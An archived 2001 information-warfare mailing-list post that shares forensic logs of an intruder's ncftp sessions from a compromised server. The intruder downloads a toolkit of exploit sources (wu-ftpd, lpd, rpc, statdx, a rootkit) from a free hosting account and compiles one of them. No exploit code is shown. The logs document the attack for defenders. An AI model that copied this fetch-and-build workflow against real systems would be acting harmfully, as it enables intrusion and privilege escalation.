Return-Path: <sentto-279987-2390-1001567143-fc=all.net@returns.onelist.com> Delivered-To: fc@all.net Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Wed, 26 Sep 2001 22:09:07 -0700 (PDT) Received: (qmail 32736 invoked by uid 510); 27 Sep 2001 05:06:51 -0000 Received: from n20.groups.yahoo.com (216.115.96.70) by 204.181.12.215 with SMTP; 27 Sep 2001 05:06:51 -0000 X-eGroups-Return: sentto-279987-2390-1001567143-fc=all.net@returns.onelist.com Received: from [10.1.1.223] by n20.onelist.org with NNFMP; 27 Sep 2001 05:06:34 -0000 X-Sender: fc@big.all.net X-Apparently-To: iwar@onelist.com Received: (EGP: mail-7_3_2_2); 27 Sep 2001 05:05:43 -0000 Received: (qmail 80330 invoked from network); 27 Sep 2001 05:05:43 -0000 Received: from unknown (10.1.10.26) by 10.1.1.223 with QMQP; 27 Sep 2001 05:05:43 -0000 Received: from unknown (HELO big.all.net) (65.0.156.78) by mta1 with SMTP; 27 Sep 2001 05:06:31 -0000 Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id WAA02210 for iwar@onelist.com; Wed, 26 Sep 2001 22:06:31 -0700 Message-Id: <200109270506.WAA02210@big.all.net> To: iwar@onelist.com (Information Warfare Mailing List) Organization: I'm not allowed to say X-Mailer: don't even ask X-Mailer: ELM [version 2.5 PL1] From: Fred Cohen <fc@all.net> Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com Delivered-To: mailing list iwar@yahoogroups.com Precedence: bulk List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com> Date: Wed, 26 Sep 2001 22:06:31 -0700 (PDT) Reply-To: iwar@yahoogroups.com Subject: [iwar] [fc:Logs.of.commands.issued.by.cracker.using.ncftp:.-] Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit For all those interested in some logs, This cracker has compromised another website - http://www.ac.ac.th/default.htm Logs of commands issued by cracker using ncftp: - LOG - unmodified topcities.com at Sun Sep 23 18:00:36 2001 get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/su.c">ftp://accessftp: href="mailto:PASSWORD @topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/su.c</a> topcities.com at Sun Sep 23 18:44:41 2001 topcities.com at Sun Sep 23 18:50:06 2001 get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/bsd.c">ftp://accessftp: href="mailto:PASSWOR D@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/bsd.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/redhat.c">ftp://accessftp: href="mailto:PASS WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/redhat.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/lpd.c">ftp://accessftp: href="mailto:PASSWOR D@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/lpd.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/bsd-x.c">ftp://accessftp: href="mailto:PASSW ORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/bsd-x.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/aix.c">ftp://accessftp: href="mailto:PASSWOR D@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/aix.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/apache.c">ftp://accessftp: href="mailto:PASS WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/apache.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/imapd.c">ftp://accessftp: href="mailto:PASSW ORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/imapd.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/remove.c">ftp://accessftp: href="mailto:PASS WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/remove.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/rip.c">ftp://accessftp: href="mailto:PASSWOR D@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/rip.c</a> topcities.com at Sun Sep 23 19:59:46 2001 get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/wuftpd-god.c">ftp://accessftp: href="mailto: PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/wuftpd-god.c</a> topcities.com at Mon Sep 24 09:51:01 2001 topcities.com at Mon Sep 24 14:07:33 2001 topcities.com at Mon Sep 24 19:37:30 2001 get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/zone-pre">ftp://accessftp: href="mailto:PASS WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/zone-pre</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/SEClpd.c">ftp://accessftp: href="mailto:PASS WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/SEClpd.c</a> get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/t666.c">ftp://accessftp: href="mailto:PASSWO RD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/t666.c</a> HISTORY - unmodified get su.c quit ls get su.c quit ls quit ls get su.c gcc -o su su.c quit ls get bsd.c get redhat.c get lpd.c get bsd-x..c get bsd-x.c getaix.c get aix.c get apache.c get imapd.c get remove.c get rip.c get rpc.autofsd.c get wu-scan.c quit get wu.c ls get wuftpd-god.c quit ls exit ls get zone-pre get SEClpd get SEClpd.c get t666.c get rpc.c quit [root@www .ncftp]# vi trace -- modified to protect someone SESSION STARTED at: Mon Sep 24 19:37:15 2001 Program Version: NcFTP 3.0.0/354 October 04 1999, 04:17 AM Library Version: LibNcFTP 3.0b3 (October 2, 1999) Process ID: 13472 Platform: linux-x86 Uname: Linux|www.COMPROMISED.com.sg|2.2.14-5.0smp|#1 SMP Tue Mar 7 21:01:40 EST 2000|i686^M Hostname: www.COMPROMISED.com.sg (rc=2) 19:37:15 Fw: firewall.COMPROMISED.com.sg Type: 0 User: jogja Pass: ******** Port: 21 19:37:15 FwExceptions: .COMPROMISED.com.sg,localhost,localdomain 19:37:15 Resolving topcities.com... 19:37:16 Connecting to 64.152.192.119... 19:37:17 Remote server is running NcFTPd. 19:37:17 Logging in... 19:37:17 220: topcities.com NcFTPd Server (licensed copy) ready. 19:37:17 Connected to 64.152.192.119. 19:37:17 Cmd: USER accessftp 19:37:28 331: User accessftp okay, need password. 19:37:28 Cmd: PASS xxxxxxxx 19:37:29 Logging in... 19:37:29 230: ####################################################################### 19:37:29 ####################################################################### 19:37:29 19:37:29 Welcome, accessftp. You are now logged into your account. 19:37:29 19:37:29 Your web site address: http://accessftp.topcities.com 19:37:29 You are connected from IP Address: [COMPROMISED HOST IP] 19:37:29 Space limit for your account: 153600000 bytes 19:37:29 Space used: 5377648 bytes 19:37:29 Maximum per-file size: 900 Kb 19:37:29 Upload bandwidth limit: 5 kB/sec 19:37:29 Download bandwidth limit: 2 kB/sec 19:37:29 PT: 0.20 19:37:29 19:37:29 Note: Please do not exceed your account quota by uploading files 19:37:29 larger than 900Kb or exceeding your space limit. If you do, subsequent 19:37:29 uploads will be unsucessful without notice to you. 19:37:29 19:37:29 ####################################################################### 19:37:29 ####################################################################### 19:37:29 19:37:29 19:37:29 19:37:29 Restricted user logged in. 19:37:29 Cmd: PWD 19:37:29 257: "/" is cwd. 19:37:29 Logged in to 64.152.192.119 as accessftp. 19:37:29 Cmd: FEAT 19:37:30 211: Extensions supported: 19:37:30 CLNT 19:37:30 MDTM 19:37:30 MLST type*;size*;modify*;UNIX.mode*;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid;unique 19:37:30 PASV 19:37:30 REST STREAM 19:37:30 SIZE 19:37:30 TVFS 19:37:30 Compliance Level: 19981201 (IETF mlst-05) 19:37:30 End. 19:37:30 Cmd: HELP SITE 19:37:30 214: The following SITE commands are recognized: 19:37:30 19:37:30 Logged in to topcities.com. 19:37:30 Cmd: CLNT NcFTP 3.0.0 linux-x86 19:37:31 200: Noted. 19:37:42 ls 19:37:42 Cmd: OPTS MLST type;size;modify;UNIX.mode;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid 19:37:42 200: Options accepted: type;size;modify;UNIX.mode;UNIX.uid;UNIX.gid 19:37:42 Cmd: PASV 19:37:42 227: Entering Passive Mode (64,152,192,119,11,87) 19:37:43 Cmd: MLSD 19:37:43 150: Data connection accepted from [COMPROMISED HOST IP]:3758; transfer starting. 19:37:44 226: Listing completed. 19:37:44 Remote listing contents { 19:37:44 type=cdir;modify=20010923154433;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 / 19:37:44 type=file;size=229995;modify=20010918134314;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 GaP.tcl 19:37:44 type=dir;modify=20010922190607;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 IIS 19:37:44 type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 SEClpd.c 19:37:44 type=file;size=44356;modify=20010915112702;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 VBTERM.ZIP 19:37:44 type=dir;modify=20010818023652;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 _data 19:37:44 type=file;size=3543;modify=20010923093715;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 aix.c 19:37:44 type=file;size=55871;modify=20010911095825;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 allchan.tcl 19:37:44 type=file;size=6242;modify=20010915094640;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 amountdexp.zip 19:37:44 type=file;size=3066;modify=20010923094606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 apache.c 19:37:44 type=file;size=5241;modify=20010911102601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ascii.tcl 19:37:44 type=file;size=24973;modify=20010919175706;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 bsd-x.c 19:37:44 type=file;size=25979;modify=20010913114244;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 bsd.c 19:37:44 type=file;size=53057;modify=20010911102624;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 fonts.txt 19:37:44 type=dir;modify=20010917133407;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 ftp 19:37:44 type=file;size=3626;modify=20010911090829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 host.tcl 19:37:44 type=file;size=3332;modify=20010915102000;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 imapd.c 19:37:44 type=file;size=2886;modify=20010919011110;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 index.htm 19:37:44 type=file;size=1784;modify=20010922040601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 loadnc.asp 19:37:44 type=file;size=2516;modify=20010911121619;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 lpd.c 19:37:44 type=file;size=3726;modify=20010918075807;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 named.htm 19:37:44 type=file;size=75482;modify=20010919130336;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 nc110.tgz 19:37:44 type=file;size=2003;modify=20010911095755;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ns.tcl 19:37:44 type=file;size=7127;modify=20010917160516;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 oftpd.tar.gz 19:37:44 type=file;size=689;modify=20010915095601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 p3-sunos.tar.gz 19:37:44 type=file;size=29;modify=20010911180121;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ps.txt 19:37:44 type=file;size=87;modify=20010911103054;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 psy.txt 19:37:44 type=file;size=197126;modify=20010905125107;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 psyBNC2.2.tar.gz 19:37:44 type=file;size=5181;modify=20010923104845;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 redhat.c 19:37:44 type=file;size=5101;modify=20010923164829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 remove.c 19:37:44 type=file;size=5553;modify=20010911123908;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rip.c 19:37:44 type=file;size=2721;modify=20010923130108;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rkit.tar.gz 19:37:44 type=file;size=3341;modify=20010912062001;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpc.autofsd.c 19:37:44 type=file;size=2837;modify=20010923151532;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpc.c 19:37:44 type=file;size=2924;modify=20010912055334;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpcBSD.tar.gz 19:37:44 type=file;size=19119;modify=20010911125301;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 statdx.c 19:37:44 type=file;size=11990;modify=20010911121600;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 su.c 19:37:44 type=file;size=7394;modify=20010922100655;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 sunbrute.c 19:37:44 type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 t666.c 19:37:44 type=file;size=242007;modify=20010921110904;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 tel.zip 19:37:44 type=file;size=2502;modify=20010919184357;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 unicode.txt 19:37:44 type=file;size=145408;modify=20010921111014;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 unzip.exe 19:37:44 type=file;size=492;modify=20010922040606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 upload.asp 19:37:44 type=file;size=5867;modify=20010922040613;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 upload.inc 19:37:44 type=file;size=2095;modify=20010918063433;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wu-scan.c 19:37:44 type=file;size=20964;modify=20010918085052;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wuftpd-god.c 19:37:44 type=file;size=19343;modify=20010913115048;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wuftpd.c 19:37:44 type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 zone-pre 19:37:44 } 19:37:44 aix.c IIS/ psy.txt t666.c 19:37:44 allchan.tcl imapd.c redhat.c tel.zip 19:37:44 amountdexp.zip index.htm remove.c unicode.txt 19:37:44 apache.c loadnc.asp rip.c unzip.exe 19:37:44 ascii.tcl lpd.c rkit.tar.gz upload.asp 19:37:44 bsd.c named.htm rpc.autofsd.c upload.inc 19:37:44 bsd-x.c nc110.tgz rpcBSD.tar.gz VBTERM.ZIP 19:37:44 _data/ ns.tcl rpc.c wuftpd.c 19:37:44 fonts.txt oftpd.tar.gz SEClpd.c wuftpd-god.c 19:37:44 ftp/ p3-sunos.tar.gz statdx.c wu-scan.c 19:37:44 GaP.tcl ps.txt su.c zone-pre 19:37:44 host.tcl psyBNC2.2.tar.gz sunbrute.c 19:38:01 get zone-pre 19:38:01 Cmd: TYPE I 19:38:01 200: Type okay. 19:38:01 Cmd: MLST zone-pre 19:38:02 250: Begin 19:38:02 type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /zone-pre 19:38:02 End. 19:38:02 Cmd: PASV 19:38:02 227: Entering Passive Mode (64,152,192,119,11,88) 19:38:02 Cmd: RETR zone-pre 19:38:03 150: Data connection accepted from [COMPROMISED HOST IP]:3759; transfer starting for zone-pre (10244 bytes). 19:38:05 226: Transfer completed. 19:38:29 get SEClpd 19:38:29 Cmd: MLST SEClpd 19:38:30 550: No such file or directory. 19:38:30 Cmd: SIZE SEClpd 19:38:30 550: No such file. 19:38:30 Cmd: PASV 19:38:30 227: Entering Passive Mode (64,152,192,119,11,90) 19:38:31 Cmd: RETR SEClpd 19:38:31 550: No such file. 19:38:39 get SEClpd.c 19:38:39 Cmd: MLST SEClpd.c 19:38:39 250: Begin 19:38:39 type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /SEClpd.c 19:38:39 End. 19:38:39 Cmd: PASV 19:38:42 227: Entering Passive Mode (64,152,192,119,11,91) 19:38:42 Cmd: RETR SEClpd.c 19:38:42 150: Data connection accepted from [COMPROMISED HOST IP]:3761; transfer starting for SEClpd.c (9911 bytes). 19:38:44 226: Transfer completed. 19:39:36 get t666.c 19:39:36 Cmd: MLST t666.c 19:39:37 250: Begin 19:39:37 type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /t666.c 19:39:37 End. 19:39:37 Cmd: PASV 19:39:37 227: Entering Passive Mode (64,152,192,119,11,93) 19:39:38 Cmd: RETR t666.c 19:39:38 150: Data connection accepted from [COMPROMISED HOST IP]:3762; transfer starting for t666.c (19809 bytes). 19:39:41 226: Transfer completed. 19:58:54 get rpc.c 19:58:54 Cmd: MLST rpc.c 19:58:54 Remote host has closed the connection. 19:58:54 421: Disconnecting you since you were inactive for 180 seconds. 19:58:54 Passive mode refused. 19:59:11 quit SESSION ENDED at: Mon Sep 24 19:59:11 2001 ------------------------ Yahoo! Groups Sponsor ---------------------~--> Get your FREE VeriSign guide to security solutions for your web site: encrypting transactions, securing intranets, and more! http://us.click.yahoo.com/UnN2wB/m5_CAA/yigFAA/kgFolB/TM ---------------------------------------------------------------------~-> ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:50 PDT